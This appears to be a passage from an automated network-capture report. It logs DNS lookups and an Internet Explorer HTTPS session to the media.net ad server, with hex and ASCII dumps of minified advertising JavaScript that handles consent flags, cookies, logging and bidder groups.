                                                                                                                                                                                                                  Dec 3, 2021 00:42:51.352286100 CET8.8.8.8192.168.2.60xd2ecNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                                  Dec 3, 2021 00:42:58.413429022 CET8.8.8.8192.168.2.60x257eNo error (0)hblg.media.net23.211.6.95A (IP address)IN (0x0001)

                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                  • https:
                                                                                                                                                                                                                    • contextual.media.net
                                                                                                                                                                                                                    • lg3.media.net
                                                                                                                                                                                                                    • hblg.media.net

                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  0192.168.2.64978623.211.6.95443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC0OUTGET /medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1 HTTP/1.1
                                                                                                                                                                                                                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                                  Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  Host: contextual.media.net
                                                                                                                                                                                                                  If-None-Match: "af9b4812e53e25fc57a13f41f6790ac9"
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Content-Length: 412168
                                                                                                                                                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                  x-mnt-h: 10-4
                                                                                                                                                                                                                  X-MNT-W: 8-13
                                                                                                                                                                                                                  ETag: "330b4b71a89f8ea60abf1630fbc12242"
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=604800
                                                                                                                                                                                                                  x-mnet-hli: E
                                                                                                                                                                                                                  Cache-Control: max-age=300
                                                                                                                                                                                                                  Expires: Thu, 02 Dec 2021 23:47:35 GMT
                                                                                                                                                                                                                  Date: Thu, 02 Dec 2021 23:42:35 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC1INData Raw: 20 20 20 20
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC1INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 77 69 6e 64 6f 77 2e 6d 6e 6a 73 3d 77 69 6e 64 6f 77 2e 6d 6e 6a 73 7c 7c 7b 7d 2c 77 69 6e 64 6f 77 2e 6d 6e 6a 73 2e 45 52 50 3d 77 69 6e 64 6f 77 2e 6d 6e 6a 73 2e 45 52 50 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 6f 72 28 76 61 72 20 6c 3d 22 22 2c
                                                                                                                                                                                                                  Data Ascii: <html><head></head><body style="margin: 0px; padding: 0px; background-color: transparent;"><script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";for(var l="",
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC33INData Raw: 43 54 45 54 22 2c 22 41 50 50 4c 59 5f 47 4f 4f 47 4c 45 5f 52 45 53 54 52 49 43 54 49 4f 4e 22 2c 22 53 54 4f 50 5f 53 50 41 4d 22 2c 22 53 54 4f 50 5f 57 48 49 54 45 4f 50 53 22 5d 2c 53 39 39 3a 5b 5d 7d 2c 64 66 63 6e 73 74 3a 22 31 4e 59 2d 22 2c 70 73 70 3a 21 30 7d 2c 74 63 66 63 6f 6e 66 69 67 3a 7b 70 61 6d 3a 7b 31 3a 7b 74 70 3a 22 43 22 2c 61 63 74 3a 5b 22 44 49 53 41 42 4c 45 5f 43 4f 4f 4b 49 45 53 59 4e 43 22 2c 22 53 54 4f 50 5f 57 48 49 54 45 4f 50 53 22 2c 22 53 54 4f 50 5f 53 50 41 4d 22 5d 7d 2c 32 3a 7b 74 70 3a 22 46 22 2c 61 63 74 3a 5b 22 44 49 53 41 42 4c 45 5f 41 44 53 22 2c 22 53 54 4f 50 5f 4c 4f 47 47 49 4e 47 5f 56 49 53 49 54 4f 52 5f 49 44 22 2c 22 54 52 49 4d 5f 4c 41 53 54 5f 4f 43 54 45 54 22 5d 7d 2c 33 3a 7b 74 70 3a
                                                                                                                                                                                                                  Data Ascii: CTET","APPLY_GOOGLE_RESTRICTION","STOP_SPAM","STOP_WHITEOPS"],S99:[]},dfcnst:"1NY-",psp:!0},tcfconfig:{pam:{1:{tp:"C",act:["DISABLE_COOKIESYNC","STOP_WHITEOPS","STOP_SPAM"]},2:{tp:"F",act:["DISABLE_ADS","STOP_LOGGING_VISITOR_ID","TRIM_LAST_OCTET"]},3:{tp:
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC41INData Raw: 63 72 6f 6c 6c 48 65 69 67 68 74 2c 74 2e 6f 66 66 73 65 74 48 65 69 67 68 74 2c 65 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 2c 65 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 2c 65 2e 6f 66 66 73 65 74 48 65 69 67 68 74 29 7d 63 61 74 63 68 28 72 29 7b 72 65 74 75 72 6e 20 30 7d 7d 66 75 6e 63 74 69 6f 6e 20 68 28 74 29 7b 74 72 79 7b 74 2e 66 72 61 6d 65 45 6c 65 6d 65 6e 74 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 76 28 74 2c 65 29 7b 72 65 74 75 72 6e 21 21 4f 28 74 29 26 26 28 4f 28 65 29 26 26 74 2e 69 6e 64 65 78 4f 66 28 65 29 21 3d 3d 2d 31 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 74 2c 65 29 7b 72 65 74 75 72 6e 21 21 4d 28 74 29 26 26 28 49 74 28 74 2c 66 75 6e 63 74 69 6f 6e 28 74 29
                                                                                                                                                                                                                  Data Ascii: crollHeight,t.offsetHeight,e.clientHeight,e.scrollHeight,e.offsetHeight)}catch(r){return 0}}function h(t){try{t.frameElement}catch(e){return!0}return!1}function v(t,e){return!!O(t)&&(O(e)&&t.indexOf(e)!==-1)}function m(t,e){return!!M(t)&&(It(t,function(t)
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC65INData Raw: 6b 69 65 3b 72 65 74 75 72 6e 21 30 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 65 28 74 29 7b 69 66 28 21 61 65 28 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 65 3d 72 2e 63 6f 6f 6b 69 65 2e 69 6e 64 65 78 4f 66 28 74 2b 22 3d 22 29 2c 6e 3d 65 2b 74 2e 6c 65 6e 67 74 68 2b 31 3b 69 66 28 21 65 26 26 74 21 3d 3d 72 2e 63 6f 6f 6b 69 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 74 2e 6c 65 6e 67 74 68 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 69 66 28 65 3d 3d 3d 2d 31 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 69 3d 72 2e 63 6f 6f 6b 69 65 2e 69 6e 64 65 78 4f 66 28 22 3b 22 2c 6e 29 3b 72 65 74 75 72 6e 20 69 3d 3d 3d 2d 31 26 26 28 69 3d 72 2e 63 6f 6f 6b 69 65 2e 6c 65 6e 67 74 68 29 2c 75
                                                                                                                                                                                                                  Data Ascii: kie;return!0}catch(t){return!1}}function ue(t){if(!ae())return null;var e=r.cookie.indexOf(t+"="),n=e+t.length+1;if(!e&&t!==r.cookie.substring(0,t.length))return null;if(e===-1)return null;var i=r.cookie.indexOf(";",n);return i===-1&&(i=r.cookie.length),u
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC97INData Raw: 7b 72 2e 51 65 28 65 29 7c 7c 28 65 3d 5b 65 5d 29 2c 74 3d 6f 28 74 29 2c 6e 3d 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 72 2e 61 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 61 2e 48 28 65 2c 74 2c 6e 29 3b 73 77 69 74 63 68 28 74 2e 74 79 70 65 29 7b 63 61 73 65 22 69 6d 67 22 3a 73 28 65 2c 72 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 63 72 69 70 74 22 3a 69 28 65 2c 74 2c 72 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 78 68 72 22 3a 75 28 65 2c 74 2c 72 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 62 22 3a 66 28 65 2c 74 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 69 66 53 63 72 22 3a 64 28 65 2c 74 2c 72 29 7d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 6e 2c 61 29 7b 6e 2e 66 6f 72 63 65 50 72 6f 74 6f 63 6f 6c 3d 3d 3d 21 30 26 26
                                                                                                                                                                                                                  Data Ascii: {r.Qe(e)||(e=[e]),t=o(t),n=n||function(){},r.a(e,function(e){var r=a.H(e,t,n);switch(t.type){case"img":s(e,r);break;case"script":i(e,t,r);break;case"xhr":u(e,t,r);break;case"sb":f(e,t);break;case"ifScr":d(e,t,r)}})}function i(t,n,a){n.forceProtocol===!0&&
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC113INData Raw: 5b 72 5d 29 26 26 28 63 2e 72 65 73 75 6c 74 5b 72 5d 3d 22 50 4f 53 54 22 29 7d 72 65 74 75 72 6e 20 63 2e 72 65 73 75 6c 74 5b 72 5d 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 72 29 7b 69 66 28 22 50 4f 53 54 22 3d 3d 3d 65 29 72 65 74 75 72 6e 20 6f 2e 6c 6f 67 55 72 6c 73 2e 70 6f 67 3b 76 61 72 20 6e 3d 75 28 72 29 3b 72 65 74 75 72 6e 22 6f 72 22 3d 3d 3d 6e 3f 6f 2e 6c 6f 67 55 72 6c 73 2e 6f 67 6f 72 65 67 6f 6e 3a 6f 2e 6c 6f 67 55 72 6c 73 2e 6f 67 7d 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 72 65 74 75 72 6e 20 6f 2e 6c 6f 67 55 72 6c 73 2e 70 6e 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 6f 29 7b 72 65 74 75 72 6e 20 66 28 65 2c 6f 29 2b 61 28 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 29 7b 72 65 74 75 72 6e 20 6f 2e 6c 6f 67 55 72 6c 73 2e 63 72 6c
                                                                                                                                                                                                                  Data Ascii: [r])&&(c.result[r]="POST")}return c.result[r]}function f(e,r){if("POST"===e)return o.logUrls.pog;var n=u(r);return"or"===n?o.logUrls.ogoregon:o.logUrls.og}function a(){return o.logUrls.pn}function d(e,o){return f(e,o)+a()}function p(){return o.logUrls.crl
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC121INData Raw: 30 7d 66 75 6e 63 74 69 6f 6e 20 4a 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 5a 54 28 68 75 29 26 26 74 2e 5a 54 28 46 75 29 26 26 21 74 2e 56 6d 28 45 75 2e 52 45 46 45 52 52 45 52 29 26 26 28 45 75 2e 52 45 46 45 52 52 45 52 3d 46 75 2e 67 65 74 43 6c 65 61 6e 52 65 66 65 72 72 65 72 55 72 6c 28 68 75 2e 67 65 74 52 65 66 65 72 72 65 72 55 72 6c 43 6f 6e 76 65 6e 74 69 6f 6e 61 6c 57 61 79 28 29 29 2c 74 2e 56 47 28 45 75 2e 52 45 46 45 52 52 45 52 29 3d 3d 3d 21 30 26 26 28 45 75 2e 52 45 46 45 52 52 45 52 3d 74 2e 59 28 45 75 2e 52 45 46 45 52 52 45 52 29 29 2c 7a 6e 28 29 3d 3d 3d 45 75 2e 52 45 46 45 52 52 45 52 26 26 28 45 75 2e 52 45 46 45 52 52 45 52 3d 22 22 29 29 2c 45 75 2e 52 45 46 45 52 52 45 52 7c 7c 22 22 7d 66 75 6e 63 74 69 6f 6e 20 51 6e
                                                                                                                                                                                                                  Data Ascii: 0}function Jn(){return t.ZT(hu)&&t.ZT(Fu)&&!t.Vm(Eu.REFERRER)&&(Eu.REFERRER=Fu.getCleanReferrerUrl(hu.getReferrerUrlConventionalWay()),t.VG(Eu.REFERRER)===!0&&(Eu.REFERRER=t.Y(Eu.REFERRER)),zn()===Eu.REFERRER&&(Eu.REFERRER="")),Eu.REFERRER||""}function Qn
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC153INData Raw: 6e 20 6e 3d 74 2c 74 68 69 73 7d 2c 74 68 69 73 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 72 65 74 75 72 6e 20 6e 5b 74 5d 3d 72 2c 74 68 69 73 7d 2c 74 68 69 73 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 5b 74 5d 7d 2c 74 68 69 73 2e 67 65 74 42 79 50 61 74 68 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 74 2e 75 28 6e 2c 72 29 7d 2c 74 68 69 73 2e 73 65 72 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 6b 28 7b 7d 2c 6e 29 7d 2c 74 68 69 73 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 74 29 7d 7d 72 65 74 75 72 6e 20 6e 7d 29 3b 5f 63 44 28 22 62 69
                                                                                                                                                                                                                  Data Ascii: n n=t,this},this.set=function(t,r){return n[t]=r,this},this.get=function(t){return n[t]},this.getByPath=function(r){return t.u(n,r)},this.serialize=function(){return t.k({},n)},this.hasOwnProperty=function(t){return n.hasOwnProperty(t)}}return n});_cD("bi
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC169INData Raw: 74 63 68 65 72 2e 61 70 70 65 6e 64 28 74 2c 74 68 69 73 2e 4c 4f 47 5f 54 59 50 45 29 7d 2c 74 68 69 73 2e 72 65 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 64 69 73 70 61 74 63 68 65 72 2e 66 69 72 65 28 29 7d 2c 74 2e 6c 28 22 61 6c 6c 3a 72 65 73 65 74 22 2c 22 63 6f 6d 6d 61 6e 64 22 2c 69 29 7d 72 65 74 75 72 6e 20 73 7d 29 3b 5f 63 44 28 22 6c 6f 67 64 69 73 70 61 74 63 68 73 65 72 76 69 63 65 22 2c 5b 22 5f 22 2c 22 65 6d 22 2c 22 6c 6f 67 73 65 6c 66 64 69 73 70 61 74 63 68 65 72 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 72 65 74 75 72 6e 20 72 2e 69 73 48 65 74 65 72 6f 67 65 6e 65 6f 75 73 4c 6f 67 67 69 6e 67 45 6e 61 62 6c 65 64 28 65 29 3f
                                                                                                                                                                                                                  Data Ascii: tcher.append(t,this.LOG_TYPE)},this.reset=function(){e.dispatcher.fire()},t.l("all:reset","command",i)}return s});_cD("logdispatchservice",["_","em","logselfdispatcher"],function(e,r,n){"use strict";function t(e){return r.isHeterogeneousLoggingEnabled(e)?
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC201INData Raw: 75 6e 63 74 69 6f 6e 20 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 39 39 22 21 3d 3d 74 2e 62 72 49 64 26 26 22 31 30 31 22 21 3d 3d 74 2e 62 72 49 64 7c 7c 65 2e 73 65 74 28 22 6f 67 62 64 70 22 2c 22 30 22 29 2e 73 65 74 28 22 62 64 70 22 2c 22 30 22 29 2e 73 65 74 28 22 63 62 64 70 22 2c 22 30 22 29 2e 73 65 74 28 22 64 66 70 42 64 22 2c 22 30 22 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 2c 73 2c 69 29 7b 76 61 72 20 64 3d 74 2e 63 72 69 64 2c 61 3d 74 2e 61 63 69 64 2c 63 3d 74 2e 73 62 64 72 69 64 7c 7c 72 2e 53 79 28 64 2c 61 29 7c 7c 22 22 2c 6d 3d 74 2e 69 73 6e 61 74 3f 70 2e 67 65 74 54 65 6d 70 6c 61 74 65 4b 65 79 46 6f 72 4e 61 74 69 76 65 53 6c 6f 74 28 64 29 3a 22 22 3b 72 65 74 75 72 6e 20 6f 2e 73 65 74 43 6f 6d 6d 6f 6e 50 72
                                                                                                                                                                                                                  Data Ascii: unction t(e,t){return"99"!==t.brId&&"101"!==t.brId||e.set("ogbdp","0").set("bdp","0").set("cbdp","0").set("dfpBd","0"),e}function s(e,t,s,i){var d=t.crid,a=t.acid,c=t.sbdrid||r.Sy(d,a)||"",m=t.isnat?p.getTemplateKeyForNativeSlot(d):"";return o.setCommonPr
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC217INData Raw: 64 65 6c 3b 64 2e 73 65 74 28 22 6e 61 6d 65 22 2c 74 2e 6e 61 6d 65 7c 7c 22 55 4e 4b 4e 4f 57 4e 22 29 2e 73 65 74 28 22 73 74 61 63 6b 22 2c 74 2e 6d 65 73 73 61 67 65 7c 7c 22 4e 4f 4e 45 22 29 2e 73 65 74 28 22 63 72 69 64 22 2c 74 2e 63 72 69 64 7c 7c 22 22 29 2e 73 65 74 28 22 64 66 70 44 69 76 22 2c 74 2e 73 6c 6f 74 49 64 7c 7c 22 22 29 2e 73 65 74 28 22 70 76 69 64 22 2c 74 2e 70 76 69 64 7c 7c 22 22 29 2e 73 65 74 28 22 64 66 70 42 64 22 2c 74 2e 64 66 70 62 64 7c 7c 22 22 29 2e 73 65 74 28 22 6c 69 64 22 2c 74 2e 6c 69 7c 7c 22 22 29 2e 73 65 74 28 22 74 72 65 66 22 2c 74 2e 72 63 74 72 3e 30 29 2e 73 65 74 28 22 72 66 63 22 2c 74 2e 72 63 74 72 29 2e 73 65 74 28 22 63 70 72 22 2c 31 65 33 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2e 73 65
                                                                                                                                                                                                                  Data Ascii: del;d.set("name",t.name||"UNKNOWN").set("stack",t.message||"NONE").set("crid",t.crid||"").set("dfpDiv",t.slotId||"").set("pvid",t.pvid||"").set("dfpBd",t.dfpbd||"").set("lid",t.li||"").set("tref",t.rctr>0).set("rfc",t.rctr).set("cpr",1e3*Math.random()).se
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC249INData Raw: 7b 7d 2c 6f 74 3d 7b 7d 2c 61 74 3d 7b 7d 2c 75 74 3d 5b 5d 2c 73 74 3d 7b 7d 2c 63 74 3d 7b 7d 2c 70 74 3d 74 68 69 73 3b 74 68 69 73 2e 67 65 74 50 72 6f 76 69 64 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 74 7d 2c 74 68 69 73 2e 69 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 74 68 69 73 2e 67 65 74 52 65 71 75 65 73 74 43 6f 75 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 24 7d 2c 74 68 69 73 2e 73 65 74 4e 65 74 77 6f 72 6b 54 69 6d 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 73 74 3d 74 7d 2c 74 68 69 73 2e 61 64 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 24 2b 2b 2c 70 74 2e 61 74 74 61 63 68 4c 69 73 74 65 6e 65 72 73 28 6e 29 3b 76 61 72 20 72 3d 74 2e 67 65 74 28 73 2e 50 72
                                                                                                                                                                                                                  Data Ascii: {},ot={},at={},ut=[],st={},ct={},pt=this;this.getProviders=function(){return ut},this.id=function(){return n},this.getRequestCount=function(){return $},this.setNetworkTime=function(t){st=t},this.add=function(t,n){$++,pt.attachListeners(n);var r=t.get(s.Pr
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC265INData Raw: 6c 6c 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 6e 29 7b 65 2e 5a 54 28 70 29 26 26 65 2e 5a 54 28 70 2e 67 65 74 41 6c 6c 28 29 29 26 26 6e 2e 70 61 72 73 65 28 70 2e 67 65 74 41 6c 6c 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 72 28 6e 29 7b 65 2e 5a 54 28 64 29 26 26 65 2e 5a 54 28 64 2e 67 65 74 41 6c 6c 28 29 29 26 26 6e 2e 70 61 72 73 65 28 64 2e 67 65 74 41 6c 6c 28 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 65 2e 5a 54 28 66 29 26 26 6e 2e 70 61 72 73 65 28 66 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 65 74 75 72 6e 20 74 28 65 29 2c 73 28 65 29 2c 72 28 65 29 2c 6f 28 65 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 6e 29 7b 76 61 72 20 74 3d 65 2e 67 65 74 50 72 6f 76 69 64 65 72 43 6f 6e 66 69 67 46 6f 72 53 6c 6f 74 28 29
                                                                                                                                                                                                                  Data Ascii: ll())}function s(n){e.ZT(p)&&e.ZT(p.getAll())&&n.parse(p.getAll())}function r(n){e.ZT(d)&&e.ZT(d.getAll())&&n.parse(d.getAll())}function o(n){e.ZT(f)&&n.parse(f)}function a(e){return t(e),s(e),r(e),o(e),e}function c(e,n){var t=e.getProviderConfigForSlot()
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC281INData Raw: 6f 6d 43 6f 6f 6b 69 65 53 79 6e 63 29 26 26 21 73 2e 69 73 41 63 74 69 6f 6e 41 70 70 6c 69 63 61 62 6c 65 28 22 44 49 53 41 42 4c 45 5f 43 4f 4f 4b 49 45 53 59 4e 43 22 29 3f 6f 2e 64 6f 43 75 73 74 6f 6d 43 6f 6f 6b 69 65 53 79 6e 63 28 29 3a 74 2e 70 75 73 68 28 65 29 7d 29 2c 54 28 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 28 29 7b 59 3d 21 30 3b 76 61 72 20 6e 3d 62 28 29 3b 46 28 6e 29 2c 68 28 6e 29 2c 79 28 29 7d 66 75 6e 63 74 69 6f 6e 20 79 28 29 7b 76 61 72 20 6e 3d 61 2e 67 65 74 45 78 70 69 72 79 4c 65 66 74 46 72 6f 6d 43 6f 6f 6b 69 65 28 29 2c 65 3d 61 2e 63 68 65 63 6b 46 6f 72 43 6f 6f 6b 69 65 44 65 6c 65 74 69 6f 6e 28 71 28 29 29 3b 28 6e 3c 3d 30 7c 7c 65 29 26 26 61 2e 64 65 6c 65 74 65 43 6f 6f 6b 69 65 28 29 2c 61 2e 64 65 6c 65
                                                                                                                                                                                                                  Data Ascii: omCookieSync)&&!s.isActionApplicable("DISABLE_COOKIESYNC")?o.doCustomCookieSync():t.push(e)}),T(t))}function Z(){Y=!0;var n=b();F(n),h(n),y()}function y(){var n=a.getExpiryLeftFromCookie(),e=a.checkForCookieDeletion(q());(n<=0||e)&&a.deleteCookie(),a.dele
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC289INData Raw: 7b 76 61 72 20 74 3d 61 2e 67 65 74 49 6e 66 6f 28 22 6c 73 22 29 3b 69 66 28 65 2e 5a 54 28 74 29 29 7b 76 61 72 20 72 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 74 29 3b 72 65 74 75 72 6e 20 72 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6e 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 76 28 29 7b 76 61 72 20 6e 3d 72 2e 6c 56 28 29 2c 74 3d 72 2e 67 63 28 29 26 26 21 72 2e 51 6e 28 29 3b 72 65 74 75 72 6e 21 28 65 2e 5a 54 28 6e 29 7c 7c 74 7c 7c 21 61 2e 4a 62 28 29 29 26 26 28 21 65 2e 69 28 4f 29 7c 7c 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 72 65 74 75 72 6e 20 73 28 29 2c 43 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 29 7b 76 61 72 20 6e 3d 28 6e 65 77 20 44 61 74 65 29 2e 67
                                                                                                                                                                                                                  Data Ascii: {var t=a.getInfo("ls");if(e.ZT(t)){var r=JSON.parse(t);return r.hasOwnProperty(n)}return!1}function v(){var n=r.lV(),t=r.gc()&&!r.Qn();return!(e.ZT(n)||t||!a.Jb())&&(!e.i(O)||!1)}function p(e){return s(),C.hasOwnProperty(e)}function k(){var n=(new Date).g
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC321INData Raw: 74 68 69 73 7d 2c 74 68 69 73 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 72 65 74 75 72 6e 20 65 5b 74 5d 3d 69 2c 74 68 69 73 7d 2c 74 68 69 73 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 5b 74 5d 7d 2c 74 68 69 73 2e 70 72 6f 76 69 64 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 74 2e 5a 54 28 65 29 29 72 65 74 75 72 6e 20 69 2e 73 65 74 28 22 70 72 76 22 2c 65 29 2c 74 68 69 73 3b 76 61 72 20 72 3d 69 2e 67 65 74 28 22 70 72 76 22 29 3b 72 65 74 75 72 6e 20 72 2e 77 68 65 72 65 28 7b 7d 29 7d 2c 74 68 69 73 2e 69 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 28 22 63 72 69 64 22 29 7d 2c 74 68 69 73 2e 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e
                                                                                                                                                                                                                  Data Ascii: this},this.set=function(t,i){return e[t]=i,this},this.get=function(t){return e[t]},this.providers=function(e){if(t.ZT(e))return i.set("prv",e),this;var r=i.get("prv");return r.where({})},this.id=function(){return i.get("crid")},this.code=function(){return
                                                                                                                                                                                                                  2021-12-02 23:42:35 UTC337INData Raw: 69 6f 6e 28 74 2c 6e 2c 69 2c 72 2c 63 2c 6f 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 69 2e 63 61 6c 6c 28 74 68 69 73 29 2c 74 68 69 73 2e 69 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 28 22 62 67 69 64 22 29 7d 2c 74 68 69 73 2e 61 6c 69 61 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 28 22 62 67 61 6c 73 22 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 29 7b 63 2e 63 61 6c 6c 28 74 68 69 73 29 7d 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 76 61 72 20 69 3d 6e 2e 62 69 64 64 65 72 47 72 6f 75 70 73 7c 7c 7b 7d 3b 74 2e 61 28 69 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 2e 61 64 64 28 28 6e 65 77 20 61 29 2e 63 6f 6e 66 69 67 28 74 29
                                                                                                                                                                                                                  Data Ascii: ion(t,n,i,r,c,o,s){"use strict";function a(){i.call(this),this.id=function(){return this.get("bgid")},this.alias=function(){return this.get("bgals")}}function u(){c.call(this)}function e(){var i=n.bidderGroups||{};t.a(i,function(t){f.add((new a).config(t)
